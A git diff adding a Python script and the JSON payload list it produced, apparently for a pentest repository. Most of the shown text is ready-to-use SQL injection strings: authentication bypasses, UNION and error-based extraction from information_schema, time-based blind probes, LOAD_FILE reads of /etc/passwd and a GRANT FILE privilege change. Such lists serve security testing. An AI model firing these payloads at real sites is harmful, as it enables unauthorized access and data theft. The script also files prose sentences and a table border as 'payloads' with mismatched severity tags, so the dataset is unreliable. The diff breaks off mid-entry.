diff --git a/SQL Injection/convert_to_json.py b/SQL Injection/convert_to_json.py new file mode 100644 index 00000000..add904b8 --- /dev/null +++ b/SQL Injection/convert_to_json.py @@ -0,0 +1,332 @@ +#!/usr/bin/env python3 +""" +Script to convert SQL Injection payloads from markdown files to JSON format +""" + +import json +import re +from pathlib import Path +from typing import List, Dict, Any + + +def is_valid_sqli_payload(line: str) -> bool: + """Check if a line is a valid SQL injection payload""" + # Skip empty lines, comments, and documentation + if not line or line.startswith('//') or line.startswith('#') or line.startswith('/*'): + return False + + # Skip lines that are clearly documentation + if line.startswith('-') or line.startswith('*') or line.startswith('['): + return False + + # Skip lines that contain common documentation words + doc_words = ['you can', 'this is', 'example:', 'note:', 'payload:', 'source:', + 'allows you', 'can be used', 'requirements:', 'description:', + 'using this', 'this will', 'for example', 'such as'] + if any(word in line.lower() for word in doc_words): + return False + + # Skip lines that are just sentences/descriptions + common_words = ['the', 'is', 'are', 'was', 'were', 'been', 'being', 'have', 'has', 'had', + 'do', 'does', 'did', 'will', 'would', 'should', 'can', 'could', 'may', + 'might', 'must', 'shall', 'a', 'an', 'and', 'or', 'but', 'if', 'because', + 'as', 'until', 'while', 'of', 'at', 'by', 'for', 'with', 'about', 'against', + 'between', 'into', 'through', 'during', 'before', 'after', 'above', 'below'] + + word_count = sum(1 for word in common_words if ' ' + word + ' ' in ' ' + line.lower() + ' ') + if word_count >= 3: # If it contains 3 or more common words, likely a sentence + return False + + # Skip http/https links that are not part of payloads + if line.startswith('http') and 'select' not in line.lower() and 'union' not in line.lower(): + return False + + # Skip table headers and separators + if line.startswith('|') or line.count('|') >= 3: + return False + + # Must contain at least one SQL injection indicator + sqli_indicators = [ + 'select', 'union', 'insert', 'update', 'delete', 'drop', 'create', + 'alter', 'exec', 'execute', 'declare', 'cast', 'convert', 'concat', + 'substring', 'sleep', 'benchmark', 'waitfor', 'delay', 'pg_sleep', + 'dbms_', 'utl_', 'xp_', 'sp_', 'sys.', 'information_schema', + 'having', 'group by', 'order by', 'limit', 'offset', 'where', + '@@', 'schema', 'database', 'table', 'column', 'char(', 'chr(', + 'ascii', 'hex', 'unhex', 'load_file', 'into outfile', 'dumpfile', + "' or ", '" or ', '-- ', '#', '/*', '*/', 'null', 'version()' + ] + + has_indicator = any(indicator in line.lower() for indicator in sqli_indicators) + + # SQL payloads often contain SQL syntax characters + has_sql_chars = any(char in line for char in ["'", '"', '--', '/*', ';', '=']) + + # Additional checks for common SQL patterns + sql_patterns = [ + r"'\s+or\s+", r'"\s+or\s+', r'1\s*=\s*1', r'1\s*=\s*2', + r'union\s+select', r'union\s+all', r'and\s+1\s*=', + r'admin\'', r'\'--', r'\'#', r'\) or ', r'\) and ' + ] + + has_sql_pattern = any(re.search(pattern, line, re.IGNORECASE) for pattern in sql_patterns) + + return has_indicator or has_sql_chars or has_sql_pattern + + +def extract_payloads_from_code_block(code_block: str, section_name: str, db_type: str = "generic") -> List[Dict[str, Any]]: + """Extract individual SQL injection payloads from a code block""" + payloads = [] + lines = code_block.strip().split('\n') + + for line in lines: + line = line.strip() + + # Validate if this is a real SQL injection payload + if not is_valid_sqli_payload(line): + continue + + # Determine type and context based on the payload + payload_type = determine_type(line, section_name) + technique = determine_technique(line) + severity = determine_severity(line) + + payload_obj = { + "payload": line, + "category": "sqli", + "metadata": { + "type": payload_type, + "technique": technique, + "dbms": db_type, + "severity": severity, + "source": section_name + } + } + payloads.append(payload_obj) + + return payloads + + +def determine_type(payload: str, section: str) -> str: + """Determine the type of SQL injection payload""" + payload_lower = payload.lower() + section_lower = section.lower() + + if 'auth' in section_lower or 'bypass' in section_lower: + return 'authentication_bypass' + elif 'union' in payload_lower: + return 'union_based' + elif 'error' in section_lower: + return 'error_based' + elif 'blind' in section_lower or 'time' in section_lower: + return 'blind' + elif 'sleep' in payload_lower or 'benchmark' in payload_lower or 'waitfor' in payload_lower or 'pg_sleep' in payload_lower: + return 'time_based' + elif 'boolean' in section_lower: + return 'boolean_based' + elif 'stacked' in section_lower: + return 'stacked_queries' + elif 'polyglot' in section_lower: + return 'polyglot' + elif 'out of band' in section_lower or 'oast' in section_lower: + return 'out_of_band' + else: + return 'generic' + + +def determine_technique(payload: str) -> str: + """Determine the SQL injection technique""" + payload_lower = payload.lower() + + if 'union' in payload_lower and 'select' in payload_lower: + return 'union_select' + elif any(keyword in payload_lower for keyword in ['sleep', 'benchmark', 'waitfor', 'pg_sleep', 'dbms_lock']): + return 'time_delay' + elif "' or " in payload_lower or '" or ' in payload_lower or '1=1' in payload_lower: + return 'boolean_logic' + elif 'extractvalue' in payload_lower or 'updatexml' in payload_lower or 'xmltype' in payload_lower: + return 'xml_error' + elif 'load_file' in payload_lower or 'into outfile' in payload_lower or 'into dumpfile' in payload_lower: + return 'file_operation' + elif 'exec' in payload_lower or 'execute' in payload_lower or 'xp_cmdshell' in payload_lower: + return 'command_execution' + elif 'cast' in payload_lower or 'convert' in payload_lower: + return 'type_conversion' + else: + return 'basic' + + +def determine_severity(payload: str) -> str: + """Determine the severity of the SQL injection payload""" + payload_lower = payload.lower() + + # Critical if it involves command execution or file operations + if any(keyword in payload_lower for keyword in ['xp_cmdshell', 'exec', 'execute', 'load_file', 'into outfile', 'into dumpfile']): + return 'critical' + # High for data extraction + elif any(keyword in payload_lower for keyword in ['union select', 'information_schema', 'sys.', 'database()', 'version()']): + return 'high' + # Medium for authentication bypass + elif "' or " in payload_lower or '" or ' in payload_lower or '1=1' in payload_lower: + return 'high' + # Medium for blind injection + elif any(keyword in payload_lower for keyword in ['sleep', 'benchmark', 'waitfor', 'pg_sleep']): + return 'medium' + else: + return 'medium' + + +def parse_markdown_file(file_path: Path) -> List[Dict[str, Any]]: + """Parse a markdown file and extract all SQL injection payloads""" + all_payloads = [] + + with open(file_path, 'r', encoding='utf-8') as f: + content = f.read() + + # Determine database type from filename + db_type = "generic" + if 'mysql' in file_path.name.lower(): + db_type = "mysql" + elif 'mssql' in file_path.name.lower(): + db_type = "mssql" + elif 'postgresql' in file_path.name.lower(): + db_type = "postgresql" + elif 'oracle' in file_path.name.lower(): + db_type = "oracle" + elif 'sqlite' in file_path.name.lower(): + db_type = "sqlite" + elif 'db2' in file_path.name.lower(): + db_type = "db2" + elif 'cassandra' in file_path.name.lower(): + db_type = "cassandra" + elif 'bigquery' in file_path.name.lower(): + db_type = "bigquery" + + # Extract code blocks + code_block_pattern = r'```(?:sql|bash|ps1|sh)?\n(.*?)```' + matches = re.findall(code_block_pattern, content, re.DOTALL) + + # Extract section headers for context + current_section = file_path.stem + + # Find section headers + section_pattern = r'^#+\s+(.+)$' + sections = re.findall(section_pattern, content, re.MULTILINE) + + # Process code blocks + for i, code_block in enumerate(matches): + # Try to find the section this code block belongs to + section_name = current_section + if i < len(sections): + section_name = sections[i] if i < len(sections) else current_section + + payloads = extract_payloads_from_code_block(code_block, section_name, db_type) + all_payloads.extend(payloads) + + return all_payloads + + +def parse_text_file(file_path: Path) -> List[Dict[str, Any]]: + """Parse a text file containing raw SQL injection payloads""" + all_payloads = [] + + with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: + lines = f.readlines() + + # Determine database type from filename + db_type = "generic" + filename_lower = file_path.name.lower() + if 'mysql' in filename_lower: + db_type = "mysql" + elif 'mssql' in filename_lower: + db_type = "mssql" + elif 'postgres' in filename_lower: + db_type = "postgresql" + elif 'oracle' in filename_lower: + db_type = "oracle" + + for line in lines: + line = line.strip() + + # Validate if this is a real SQL injection payload + if not is_valid_sqli_payload(line): + continue + + payload_type = determine_type(line, file_path.stem) + technique = determine_technique(line) + severity = determine_severity(line) + + payload_obj = { + "payload": line, + "category": "sqli", + "metadata": { + "type": payload_type, + "technique": technique, + "dbms": db_type, + "severity": severity, + "source": file_path.stem + } + } + all_payloads.append(payload_obj) + + return all_payloads + + +def main(): + """Main function to convert all SQL injection payloads to JSON""" + base_dir = Path(__file__).parent + output_file = base_dir / 'sqli_payloads.json' + + all_payloads = [] + + # Process markdown files + md_files = [ + 'README.md', + 'MySQL Injection.md', + 'MSSQL Injection.md', + 'PostgreSQL Injection.md', + 'OracleSQL Injection.md', + 'SQLite Injection.md', + 'DB2 Injection.md', + 'Cassandra Injection.md', + 'BigQuery Injection.md' + ] + + for md_file in md_files: + file_path = base_dir / md_file + if file_path.exists(): + print(f"Processing {md_file}...") + payloads = parse_markdown_file(file_path) + all_payloads.extend(payloads) + print(f" Found {len(payloads)} payloads") + + # Process Intruder folder + intruder_dir = base_dir / 'Intruder' + if intruder_dir.exists(): + for txt_file in intruder_dir.iterdir(): + if txt_file.is_file(): + print(f"Processing {txt_file.name}...") + payloads = parse_text_file(txt_file) + all_payloads.extend(payloads) + print(f" Found {len(payloads)} payloads") + + # Remove duplicates while preserving order + seen = set() + unique_payloads = [] + for payload in all_payloads: + payload_str = payload['payload'] + if payload_str not in seen: + seen.add(payload_str) + unique_payloads.append(payload) + + # Write to JSON file + with open(output_file, 'w', encoding='utf-8') as f: + json.dump(unique_payloads, f, indent=2, ensure_ascii=False) + + print(f"\nTotal payloads: {len(all_payloads)}") + print(f"Unique payloads: {len(unique_payloads)}") + print(f"Output saved to: {output_file}") + + +if __name__ == '__main__': + main() diff --git a/SQL Injection/sqli_payloads.json b/SQL Injection/sqli_payloads.json new file mode 100644 index 00000000..c0b480a8 --- /dev/null +++ b/SQL Injection/sqli_payloads.json @@ -0,0 +1,15941 @@ +[ + { + "payload": "'||'DERP", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL Injection" + } + }, + { + "payload": "'+'herp", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL Injection" + } + }, + { + "payload": "' 'DERP", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL Injection" + } + }, + { + "payload": "'%20'HERP", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL Injection" + } + }, + { + "payload": "'%2B'HERP", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "SQL Injection" + } + }, + { + "payload": "page.asp?id=1 or 1=1 -- true", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "page.asp?id=1' or 1=1 -- true", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "page.asp?id=1\" or 1=1 -- true", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Summary" + } + }, + { + "payload": "page.asp?id=1 and 1=2 -- false", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Summary" + } + }, + { + "payload": "Let's assume a vulnerable web application retrieves product details based on a product ID from a database:", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Raw MD5 and SHA1" + } + }, + { + "payload": "' False", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "'' True", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "\" False", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "\"\" True", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "' OR '1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Default Databases" + } + }, + { + "payload": "' OR 1 -- -", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Default Databases" + } + }, + { + "payload": "\" OR \"\" = \"", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Default Databases" + } + }, + { + "payload": "\" OR 1 = 1 -- -", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Default Databases" + } + }, + { + "payload": "'='", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Default Databases" + } + }, + { + "payload": "'LIKE'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Default Databases" + } + }, + { + "payload": "'=0--+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Default Databases" + } + }, + { + "payload": "UNION SELECT NULL;--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Comments" + } + }, + { + "payload": "UNION SELECT NULL, NULL;--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Comments" + } + }, + { + "payload": "UNION SELECT NULL, NULL, NULL;--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Comments" + } + }, + { + "payload": "ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ # Unknown column '4' in 'order clause'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Testing Injection" + } + }, + { + "payload": "UNION SELECT 1,2,3,4,...,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Union Based" + } + }, + { + "payload": "UNION SELECT 1,2,3,4,...,GROUP_CONCAT(0x7c,table_name,0x7C) FROM information_schema.tables WHERE table_schema=PLACEHOLDER", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "Detect Columns Number" + } + }, + { + "payload": "UNION SELECT 1,2,3,4,...,GROUP_CONCAT(0x7c,column_name,0x7C) FROM information_schema.columns WHERE table_name=...", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "Iterative NULL Method" + } + }, + { + "payload": "UNION SELECT 1,2,3,4,...,GROUP_CONCAT(0x7c,data,0x7C) FROM ...", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "ORDER BY Method" + } + }, + { + "payload": "SELECT `4` FROM (SELECT 1,2,3,4,5,6 UNION SELECT * FROM USERS)DBNAME;", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "LIMIT INTO Method" + } + }, + { + "payload": "MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SELECT 1,(SELECT CONCAT(`3`,0X3A,`4`) FROM (SELECT 1,2,3,4,5,6 UNION SELECT * FROM USERS)A LIMIT 1,1);", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "Extract Database With Information_Schema" + } + }, + { + "payload": "+-----------+-----------------------------------------------------------------+", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "Extract Database With Information_Schema" + } + }, + { + "payload": "(SELECT 1 AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "Extract Columns Name Without Information_Schema" + } + }, + { + "payload": "'+(SELECT 1 AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))+'", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "Extract Columns Name Without Information_Schema" + } + }, + { + "payload": "AND UPDATEXML(rand(),CONCAT(CHAR(126),version(),CHAR(126)),null)-", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "Extract Data Without Columns Name" + } + }, + { + "payload": "AND UPDATEXML(rand(),CONCAT(0x3a,(SELECT CONCAT(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "Extract Data Without Columns Name" + } + }, + { + "payload": "AND UPDATEXML(rand(),CONCAT(0x3a,(SELECT CONCAT(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "Extract Data Without Columns Name" + } + }, + { + "payload": "AND UPDATEXML(rand(),CONCAT(0x3a,(SELECT CONCAT(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "Extract Data Without Columns Name" + } + }, + { + "payload": "AND UPDATEXML(rand(),CONCAT(0x3a,(SELECT CONCAT(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "xml_error", + "dbms": "mysql", + "severity": "medium", + "source": "Extract Data Without Columns Name" + } + }, + { + "payload": "UPDATEXML(null,CONCAT(0x0a,version()),null)-- -", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based" + } + }, + { + "payload": "UPDATEXML(null,CONCAT(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based" + } + }, + { + "payload": "?id=1 AND EXTRACTVALUE(RAND(),CONCAT(CHAR(126),VERSION(),CHAR(126)))--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - Basic" + } + }, + { + "payload": "?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0X3A,(SELECT CONCAT(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - Basic" + } + }, + { + "payload": "?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0X3A,(SELECT CONCAT(CHAR(126),table_name,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - Basic" + } + }, + { + "payload": "?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0X3A,(SELECT CONCAT(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "xml_error", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - Basic" + } + }, + { + "payload": "?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0X3A,(SELECT CONCAT(CHAR(126),data_column,CHAR(126)) FROM data_schema.data_table LIMIT data_offset,1)))--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "xml_error", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Error Based - Basic" + } + }, + { + "payload": "?id=1 AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - UpdateXML Function" + } + }, + { + "payload": "?id=1 AND (SELECT * FROM (SELECT NAME_CONST(user(),1),NAME_CONST(user(),1)) as x)--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Error Based - UpdateXML Function" + } + }, + { + "payload": "?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - UpdateXML Function" + } + }, + { + "payload": "?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - Extractvalue Function" + } + }, + { + "payload": "?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - Extractvalue Function" + } + }, + { + "payload": "?id=1 AND ASCII(LOWER(SUBSTR(version(),1,1)))=51", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - Extractvalue Function" + } + }, + { + "payload": "2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2", + "category": "sqli", + "metadata": { + "type": "error_based", + "technique": "time_delay", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Error Based - NAME_CONST function (only for constants)" + } + }, + { + "payload": "2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Blind" + } + }, + { + "payload": "AND MAKE_SET(VALUE_TO_EXTRACT<(SELECT(length(version()))),1)", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Blind With Substring Equivalent" + } + }, + { + "payload": "AND MAKE_SET(VALUE_TO_EXTRACT=100,1, BENCHMARK(2000000,MD5(NOW()))) --", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Current Queries" + } + }, + { + "payload": "?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1))>=100, 1, SLEEP(3)) --", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Current Queries" + } + }, + { + "payload": "?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Current Queries" + } + }, + { + "payload": "(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Read Content of a File" + } + }, + { + "payload": "(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MYSQL Read Content of a File" + } + }, + { + "payload": "make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Command Execution" + } + }, + { + "payload": "(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "WEBSHELL - OUTFILE Method" + } + }, + { + "payload": "(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "WEBSHELL - DUMPFILE Method" + } + }, + { + "payload": "(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "COMMAND - UDF Library" + } + }, + { + "payload": "+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL INSERT" + } + }, + { + "payload": "(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Truncation" + } + }, + { + "payload": "SELECT * FROM INFORMATION_SCHEMA.PROCESSLIST;", + "category": "sqli", + "metadata": { + "type": "out_of_band", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MYSQL Out of Band" + } + }, + { + "payload": "UNION SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST #", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "DNS Exfiltration" + } + }, + { + "payload": "UNION SELECT 1,(SELECT(@)FROM(SELECT(@:=0X00),(SELECT(@)FROM(information_schema.processlist)WHERE(@)IN(@:=CONCAT(@,0x3C62723E,state,0x3a,info))))a),3,4 #", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mysql", + "severity": "high", + "source": "UNC Path - NTLM Hash Stealing" + } + }, + { + "payload": "UNION ALL SELECT LOAD_FILE('/etc/passwd') --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "mysql", + "severity": "critical", + "source": "MYSQL WAF Bypass" + } + }, + { + "payload": "UNION ALL SELECT TO_base64(LOAD_FILE('/var/www/html/index.php'));", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "mysql", + "severity": "critical", + "source": "MYSQL WAF Bypass" + } + }, + { + "payload": "GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "Alternative to Information Schema" + } + }, + { + "payload": ":warning: Don't forget to escape the '\\\\\\\\'.", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "`information_schema.tables` alternative", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "high", + "source": "MySQL Injection" + } + }, + { + "payload": "Requirement: `MySQL >= 5.7.22`", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "Use `json_arrayagg()` instead of `group_concat()` which allows less symbols to be displayed", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "The format is: `base 'e' exponent`.", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "MySQL Injection" + } + }, + { + "payload": "SELECT name FROM master..sysdatabases;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "MSSQL Injection" + } + }, + { + "payload": "SELECT name FROM master.sys.databases;", + "category": "sqli", + "metadata": { + "type": "generic", + 